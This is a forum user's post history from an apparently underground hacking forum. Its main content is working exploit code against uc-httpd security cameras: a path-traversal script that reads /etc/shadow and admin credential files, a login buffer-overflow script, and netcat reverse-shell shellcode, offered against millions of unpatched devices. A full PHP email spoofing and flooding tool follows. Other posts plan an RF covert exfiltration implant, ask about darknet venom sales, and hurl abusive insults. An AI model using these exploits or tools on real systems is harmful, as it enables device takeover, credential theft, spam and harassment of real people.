User Controls
Posts by MLT
-
2021-10-27 at 10:36 AM UTC in n-day IoT LFD+RCE Buffer overflow exploit - 2million+ vulnerable devices - for research only :) do not abuse.
Originally posted by Sophie If open source OffSec scripts/tools/frameworks were illegal to post, a lot of people i follow and work with on Github would be in a lot of trouble. I think code is a little like free speech in that regard, and as long as you are not encouraging malicious use i think you should be fine. Weaponizing all the things is definitely my jam though.
While what you're saying is correct in theory.. I'm in the UK currently and I literally got raided in 2019 by NCA for writing some code. I feel like they'd try make the argument that the mere act of me weaponizing it could prove malicious intent. -
2021-10-21 at 9:57 AM UTC in Sh/Bash based malware for *Nix.
Originally posted by troon you got me. i can taste my own tears. i'm really not trolling you, just responding to your crap-posting and schizo outbursts. then i learned you're actually a sick individual. i had thought it was satire, or at least just for your imagination. but no.
You're literally messaging two entirely different people you incompetent fuckwit lol -
2021-10-20 at 9:33 PM UTC in Sh/Bash based malware for *Nix.
Originally posted by Sophie If we do know each other we should follow each other on Github. Maybe i already do. I'll get back to you in a bit.
I'm not particularly active on github these days. Majority of coding I do is behind the scenes. Although I could make some private repos to add you to those for some cool projects I'm working on (a stealth-based webshell, a custom uri scheme fuzzer, a web-based spear phishing framework.. to name a few)
I'm mostly active on keybase or matrix. Or you can find me at https://twitter.com/0dayWizard or https://twitter.com/insecurity if you happen to use twitter.
Originally posted by troon you sad schizo cunt. you should go ahead and follow yourself, then randomly unfollow and have yourself a neurotic meltdown.
Your attempts at trolling aren't even funny or creative. Just boring. Seriously why didn't anyone tell your mother to have her tubes cut before having sex with her crack dealer?
You're calling people schizo but you're the only person here acting like a schizo.. and you clearly lack knowledge relating to fundamental concepts of cybersec considering your response to my message about a Linux rootkit. If you have nothing worthwhile to contribute to this convo, then just stop posting. Oh, and for the love of humanity.. please don't ever breed you fucking worthless reject. Do the right thing and allow your bloodline to become naturally eradicated from the gene-pool. -
2021-10-20 at 9:30 PM UTC in n-day IoT LFD+RCE Buffer overflow exploit - 2million+ vulnerable devices - for research only :) do not abuse.
Originally posted by Sophie Neat. I suppose we could easily add some fuzzing capabilities for discovering local files. Integrating Shodan into your script for automated acquisition of targets is relatively straightforward as well. If we add a little CLI you could even have a (limited) pseudo shell ala Commix.
Yup could be done easily enough :) I just didn't wanna weaponize this publicly because then im not so sure on the legality of posting it (if weaponized). -
2021-10-11 at 7:25 PM UTC in n-day IoT LFD+RCE Buffer overflow exploit - 2million+ vulnerable devices - for research only :) do not abuse.So, here is an n-day expoit that we (my 0day development crew) found back in 2017 (zero-day at the time). Reposting from my github. It's still unpatched despite being four years old, with over two million vulnerable IoT devices (with remote root possible on all of them).
The affected software is "uc-httpd" which is a web interface for a series of models of security cams. Due to the nature of this vuln, it's not possible for them to patch it without performing a mass product recall and re-writing the firmware, so currently it's still exploitable as an n-day :)
Do not abuse this. This is only for research, nothing else. I can't be held liable for your stupidity.
There are multiple exploits here. There is a local file disclosure and also a buffer overflow - you can generally get root via the LFD alone, so there's not really much need for the buffer overflow unless an LFD scenario fails.
So, the LFD is sent as a direct HTTP request to the box, rather than being a vuln POST/GET param. You can generally read /etc/shadow file on the box via the LFD, which contains PLAINTEXT hashes for the root password (so you can just SSH into teh box as root from there using the plaintext pass).
If for some reason you can't read the shadow file via the LFD, then instead you should attempt to read /mnt/mtd/Config/Account1 to get credentials from the admin interface, and then you can abuse the overflow from there to get root.
Here you can see the results from shodan, showing that there are currently more than 1.9 million devices running this (with our more extensive scanning returning over 2.5million devices):
LFD automated exploit code (python):
#!/usr/bin/env python
import urllib2, httplib, sys
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'
print "[+] uc-httpd 0day exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>"
host = sys.argv[1]
fd = raw_input('[+] File or Directory: ')
print "Exploiting....."
print '\n'
print urllib2.urlopen(host + '/../../../../..' + fd).read()
It is also worth noting, that in addition to the LFD vuln... you can also supply a directory path to uc-httpd in the same manner that you'd supply the file you want to disclose... it will then output the contents of the directory to you as if you ran "ls" on that dir, so you can use that to enumerate directory contents in order to read even more files (although generally all you need to read to pop root is /etc/shadow or /mnt/mtd/Config/Account1)
If you can't read shadow file and ssh direct into the box as root that way, then read Account1 file and use the following buffer overflow within the web interface (protip: if ASLR is enabled, you can get the relevant memory regions via reading particular proc entries through the LFD)
Buffer Overflow automated exploit code (python):
import mechanize, time, sys, urllib, socket
from termcolor import colored
print colored('uc-httpd web-daemon bufferoverflow', 'red')
print colored('- Overwrites the stack (attach to see)', 'red')
print colored('- Kernel watchdog module restarts Sofia after 2 minutes', 'red')
time.sleep(2)
def at_login_overflow():
print colored('Sending payload.. ', 'red')
s_c = "\x2f\x4c\x6f\x67\x69\x6e\x2e\x68\x74\x6d" # Page id
x = mechanize.Browser()
x.set_handle_robots(False)
x.set_debug_responses(True)
x.addheaders = [("User-agent",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]
login = x.open(tar_full + s_c)
x.select_form(nr=0)
x["username"] = buffersm
x["password"] = "mikevirushackinglimited"
try:
x.submit()
except Exception:
print colored('Target daemon not vulnerable.', 'red')
pass
check_conn()
# Check interface status
def check_conn():
time.sleep(1)
print colored('Checking interface status..', 'red')
try:
urllib.urlopen(tar_full)
print colored('Exploit failed', 'red')
except Exception:
print colored('Finished.', 'red')
pass
tar = sys.argv[1]
tar_p = sys.argv[2]
buff_size = sys.argv[3]
tar_full = "http://" + tar + ":" + tar_p
# rec 180
buffersm = "\x41" * int(buff_size)
# post only
at_login_overflow()
Overwrite set shellcode:
\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x48\xc1\xef\x08\x57
\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51
\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb\x30\x53
\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33\x33\x37\x49\xc1\xea\x20\x41
\x52\x49\x89\xe2\xeb\x11\x41\x59\x52\x51\x53\x41\x52\x41\x51\x57\x48\x89
\xe6\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37\x2e\x30\x2e\x30\x2e
\x31\xec\xf3\x26\x5a\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63
\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68
\x48\xc1\xe9\x08\x51\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65
\x48\xc1\xeb\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33\x33\x37
\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\xeb\x11\x41\x59\x52\x51\x53\x41\x52
\x41\x51\x57\x48\x89\xe6\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37
\x2e\x30\x2e\x30\x2e\x31
enjoy ;) but please don't abuse. -
2021-10-09 at 10:52 AM UTC in Sh/Bash based malware for *Nix.
-
2021-10-08 at 3:36 PM UTC in Sh/Bash based malware for *Nix.
-
2021-10-08 at 9:12 AM UTC in Sh/Bash based malware for *Nix.
Originally posted by troon Are you maybe a schizo-posting pedo?
A zero day multi-arch ring3 to ring0? I fucking wait with bated breath.
I'm not sure whether to laugh or cringe.
Evidently you lack the ability to read a few sentences without somehow fucking up. I never said the rkit was 0day, I ASKED if the xorg thing was 0day before going on to talk about an UNRELATED rootkit that I plan to post. Maybe before diving right into ad hominem, try actually reading what I wrote properly? Either you didn't properly read what I wrote, or you completely misunderstood what I wrote. Either way, it makes you look stupid considering I never even said anything about ANY of my stuff being zeroday. -
2021-10-07 at 3:32 AM UTC in Anyone here got a good amount of experience with RF?
Originally posted by cryptographiccontrarian i had an sdr but some retarded tweaker disassembled all the pieces and scattered them across the land for no good reason other than he was high as shit, and i never recovered them all, although i'm sure they are here somewhere
looool, that's just such fucking typical tweaker behaviour XDDD made me chuckle -
2021-10-07 at 3:11 AM UTC in Anyone here got a good amount of experience with RF?
Originally posted by aldra I've done some low-level arduino radio projects; trasmitting data back and forth isn't difficult once you've got the connection set up but trying to adapt SSH to work that way would be a lot of work
Well, my friend who's into radio stuff actually sent me a library which has already fully implemented SSH on a HackRF :) so I don't think too much work would actually be required on my behalf to be able to get it to connect to SSH.
Also, I've been looking at some remote access features for software-defined radios... some of the tools here could be useful for what im doing for sure: https://0xfeed.tech/2017/04/remote-access-tools-for-sdr-receivers/ (these ones arent over SSH, I'll find that for you tomorrow... but here it shows a few other ways of remote access via SDR) -
2021-10-07 at 3:02 AM UTC in Bufo Alvarius care / milking venom glandsSkip the last question, how much per dose for the venom if sold via DNM? Asking for a friend
-
2021-10-07 at 2:57 AM UTC in SMTP Spoofing/Flooding tool that I wrote back during /i/nsurgency wikiHey, so, this is just a quick post for a basic SMTP Spoofer/Flooder tool that I wrote years ago but still works. To use this you just need a webserver w/ PHP + STMP on teh same box. This was originally packaged with dangerouskitten raid pack during /i/ back in the day.
If they have SPF, DMARC, etc in place, then this likely will not work... but if they don't have those in place, itt'l work no problem. It should also work by default on all mail providers other than google chrome. If people actually care then I'll write an updated version of this which will have the ability to bypass SPF and DMARC to effectively perform mail spoofing against more secure mail servers.
Here is the source code (PHP script w/ HTML/CSS/JS user interface):
<html>
<head>
<style type="text/css">
.header
{
background-color: #ffccaa;
}
.cell1
{
background-color: #ffeeca;
width: 50%;
}
.cell2
{
background-color: #ffeeca;
}
body
{
font: normal 0.8em Verdana, sans-serif;
background-color: #FFFFEE;
}
smalltext
{
font: normal .8em Verdana, sans-serif;
}
</style>
<script language="javascript" type="text/javascript">
function randclick()
{
var random = document.getElementById('randbox').checked;
document.getElementById('frombox').disabled = random;
document.getElementById('replybox').disabled = random;
}
function floodc()
{
var fc = document.getElementById('floodbox').checked;
if(!fc)
{
alert("Turning flood control off almost guarantees detection and action by your ISP.\nOnly turn this off if you are SURE it's okay with your ISP to send the amount of e-mail you plan to send.");
}
}
</script>
<title>E-mail Flooder</title>
</head>
<body>
<center>
<h3>Requires an SMTP and Web server</h3>
<?
function randomEmail()
{
// returns a random, spoofed e-mail address.
// pick two numbers, one in
// [6-10] range, one in [4-20] range, and a random domain.
// for each #, generate that many random letters/numbers, splice together.
$usernum = rand(3,10);
$domainnum = rand(4,10);
$userstr="";
$domainstr="";
for($u=0;$u<$usernum;$u++)
{
// random letter of betabet.
$ranletter = chr( ord("a") + rand(0, 25) );
$userstr.=$ranletter;
}
for($d=0;$d<$domainnum;$d++)
{
// random letter of betabet.
$ranletter = chr( ord("a") + rand(0, 25) );
$domainstr.=$ranletter;
}
$email = "$userstr@$domainstr.com";
return $email;
}
$action =$_POST["submit"];
if($action!=" SPAM ")
{
?>
<form method="post" action="?" name="inputpanel">
<table border="1" cellpadding="2">
<tr>
<td colspan="2" class="header">
<p align="center" style="color: ; font-size: 1.5em">E-Mail Flooder</td>
</tr>
<tr>
<td class="cell1">
<p align="right"><b>Subject:</b></td>
<td class="cell2">
<input name="subject" size="30"/>
</td>
</tr>
<tr>
<td colspan="2" class="cell1">
<p align="center">
<b>Message to send:</b>
</p>
</td>
</tr>
<tr>
<td colspan="2" class="cell2">
<p align="center">
<textarea rows="6" cols="55" name="message" class="inputbox" style="overflow:scroll"></textarea></td>
</p>
</tr>
<tr>
<td class="cell1">
<p align="right"><b>To:</b></td>
<td class="cell2">
<input name="emailto" size="30"/>
</td>
</tr>
<tr>
<td class="cell1">
<p align="right"><b>From:</b></td>
<td class="cell2">
<input name="emailfrom" id="frombox" size="30" value="webmaster@ebaumsworld.com" /><br>
<smalltext>Random</smalltext> <input type="checkbox" id="randbox" name="random" onClick="javascript:randclick();" value="ON">
</td>
</tr>
<tr>
<td class="cell1">
<p align="right"><b>Reply-To:</b></td>
<td class="cell2">
<input name="emailreply" id="replybox" size="30" value="webmaster@ebaumsworld.com" />
</td>
</tr>
<tr>
<td class="cell1">
<p align="right"><b>Number to Send:</b></td>
<td class="cell2">
<input name="emailquantity" size="5" maxlength="4" value="10" /><br>
<smalltext>Flood Control</smalltext> <input type="checkbox" id="floodbox" name="floodcontrol" onClick="javascript:floodc();" value="ON" checked />
</td>
</tr>
<tr>
<td colspan="2" class="header">
<p align="center"><input class="submit" type="submit" name="submit" value=" SPAM " /></td>
</tr>
</table>
</form>
<?
}else
{
$to = $_POST["emailto"];
$from = $_POST["emailfrom"];
$reply = $_POST["emailreply"];
$subj = stripslashes($_POST["subject"]);
$msg = stripslashes($_POST["message"]);
$random = $_POST["random"];
$quantity = $_POST["emailquantity"];
$floodcontrol = $_POST["floodcontrol"];
if($to==""||$subj==""||$msg=="")
{
echo "You must fill out the Subject, Message, and Recipient.<br>";
}else
{
if(($from==""||$reply=="")&&$random!="ON")
{
echo "You must enter a sender and a reply-to address.<br>";
}else
{
set_time_limit(0);
// okay
$counter=0;
for($e=0;$e<$quantity;$e++)
{
if($random=="ON")
{
$r = randomEmail();
$from = $r;
$reply = $r;
}
// we're ready.
$headers = "";
$headers.="From: $from\r\n";
$headers.="Reply-To: $from\r\n";
$headers.="Return-Path: null\r\n";
$sentaway = @mail($to,$subj,$msg,$headers);
if($sentaway)
{
echo "Sent email <b>#$e</b> from <b>$from</b> to <b>$to</b><br>";
}else
{
echo "<font color='red'>Couldn't send email <b>#$e</b></font><br>";
}
$counter++;
if($counter==10&&$floodcontrol)
{
echo "Wait <u>5</u> seconds...<br>";
$counter=0;
sleep(5);
}
}
set_time_limit(30);
}
}
}
?>
</center>
</body>
</html> -
2021-10-07 at 2:52 AM UTC in Anyone here got a good amount of experience with RF?
Originally posted by cryptographiccontrarian yea idk maybe but it would be much easier to just make a cockroach into a robot slave and have it spy on them and report back and/or set up a numbers station inside
lol, I only recently found out about those zombie cockroaches. Crazy shit... tempted to order one of those RoboRoach kits. -
2021-10-07 at 2:49 AM UTC in Sh/Bash based malware for *Nix.nice xorg vuln, is it a zero-day? I've never seen it before.. if it's 0day then damn nice :P
also, nice thread in general. I've got a ring3/userland linux rootkit based on DR0 (debug register, as opposed to LD_PRELOAD / dynamic linker) which I'll post tomorrow... it's multi-arch too (inline asm for each architecture.. itt'l use uname -m or /proc entries to detect the architecture in use, then run the relevant arch-specific inline assembly from there).
Also, I said it's userland... well, that's not fully true. It's also active in kernelspace. It's just residing in userland/ring3 rather than at ring0, so that if the fucker updates their kernel they're still hooked. So basically it's living in userland but is performing ring3->ring0 hooking
I suck dick at C(++), ASM, and kernel stuff in general... so I'm actually really fucking happy with how this kit has been coming along. It's only the 2nd kit I ever wrote too. First used LD_PRELOAD.
The bash obfuscation you posted has inspired me to post a thread detailing a bunch of my bash obfuscation tricks, too :)
EDIT:
lol... do we know eachother btw? If so, who are you? PM if you don't wanna reveal your nick here.
Just noticed you posted this https://niggasin.space/thread/5020 (that fuzzer is incredibly gross btw lmao wrote it for the memez hence the goto(); sphagetti code, zero bound checks anywhere, and user inputs passed to syscalls errywhere. I wrote a proper flash fuzzer in ruby. I'll upload that one for you. It uses the same lists, but it opens proper sockets etc rather than doing fucking gnome-www-browser loool) -
2021-10-07 at 2:41 AM UTC in Hi, just introducing myself.
Originally posted by AngryOnion Post tits or get the fuck out.
I'm male... so unless you wanna see some juicy man-titties ;)
Originally posted by STER0S what drugs do you use
In the past I've done everything from heroin to datura to ketamine.. pretty much every major drug you can think of, I've likely tried at some stage.
These days I've calmed down a lot though. Now I only do weed and psychedelics (specifically just mushrooms and DMT). Oh, and I still drink alcohol too. -
2021-10-07 at 2:40 AM UTC in Anyone here got a good amount of experience with RF?So, my friend and I were brainstorming and came up with an idea... we just need someone who's a radio geek to confirm whether or not this will actually work (I don't see any reason why it shouldn't).
I was recently reading a paper on connecting via SSH over radio frequencies. Similar to the stuff seen here or here
The fact you are abler to connect to SSH via radio got us thinking... what if we were to build an RF-Based device that used SSH over radio as a data exfiltration channel on a network that we compromised via physical access?
So, for example, there is a took made via hak5 known as the "LAN Turtle" - https://hak5.org/products/lan-turtle
this is a sneaky data exfiltration hardware device, that you would plug in somewhere on the target network... it would then collect data from that network and allow a remote attacker to be able to view such data.. so, obviously the LAN Turtle works via sending traffic over their network.. meaning that if they caught wind of a cyberattack, they could just analyze local network traffic in order to figure out the point of data exfil, and then remove the hardware implant for the LAN turtle from there.. well, we want to essentially create the same thing, except rather than it exfiltrating the data via LAN, it will do so via radio frequencies over SSH. We will use something like a HackRF, or even an Ardunio with an added radio transmitter. Once the device is made, we can enter the target building, hook it up on their network somewhere, and then we can sit a few miles away from their building with a secondary device which handles SSh. So, itt'l exfiltrate data from the network via RF, and, even if teh admin is aware data is being exfiltrated, they will attempt to find out the source using traditional methods e.g. analyzing network traffic, except since everything is happening over RF there won't be anything within the traffic to indicate where the data exfil point is, making it a lot harder to detect.
Thoughts? We plan to build an initial prototype and see how it goes from there.
I didn't do the best job of explaining this, so if anyone has any questions then ask away and I'll do my best to clear things up.
Also, if anyone can think of any reason why this WOULDN'T work, then please do let me know. -
2021-10-07 at 2:11 AM UTC in Hi, just introducing myself.Thanks for the responses guys :) hoping to meet some likeminded people here. Tomorrow I'll begin with posting a bunch of threads.
Originally posted by Lanny Says your email is verified, you might have clicked the link twice or something. If you can post then you should be good to go. Captcha goes away after 20 posts
Hmm, okay, yeah.. I guess I double-clicked it then. Thanks for clearing up. -
2021-10-07 at 1:43 AM UTC in Hi, just introducing myself.Hey, I'm MLT. I'm new to these forums but I'm a long time TOTSE lurker. Was on &T since the early 2000's, and was active on Zoklet after everyone from TOTSE migrated there. If anyone happens to remember me from TOTSE, then feel free to introduce yourself :)
I'm going to be posting a number of threads here, mostly in the "bad ideas", "better living through chemistry", "technophiliacs and technophiles", and "backyard ballistics".
I mostly have experience within clandestine chemistry, and hacking/cybersecurity, so I'll be contributing as much as I possibly can with content of that sort.
Anyways, just thought I'd say hi. I'm going to be posting here relatively often.
Oh - only kind of related by the way, but my validation email is saying my validation code is incorrect (it is not). Is it possible to re-send the validation email via forum settings, or would I have to go through the entire process of making a new account or contacting an admin?
EDIT: Damn, how long am I limited to 10 posts per day for? :/ had a great thread planned, was boutta drop an 0day exploit worth a bunch of $$$ (over 2 million vulnerable devices) which im sure some peopple here would find very useful... but now i cant make any more posts for another day.
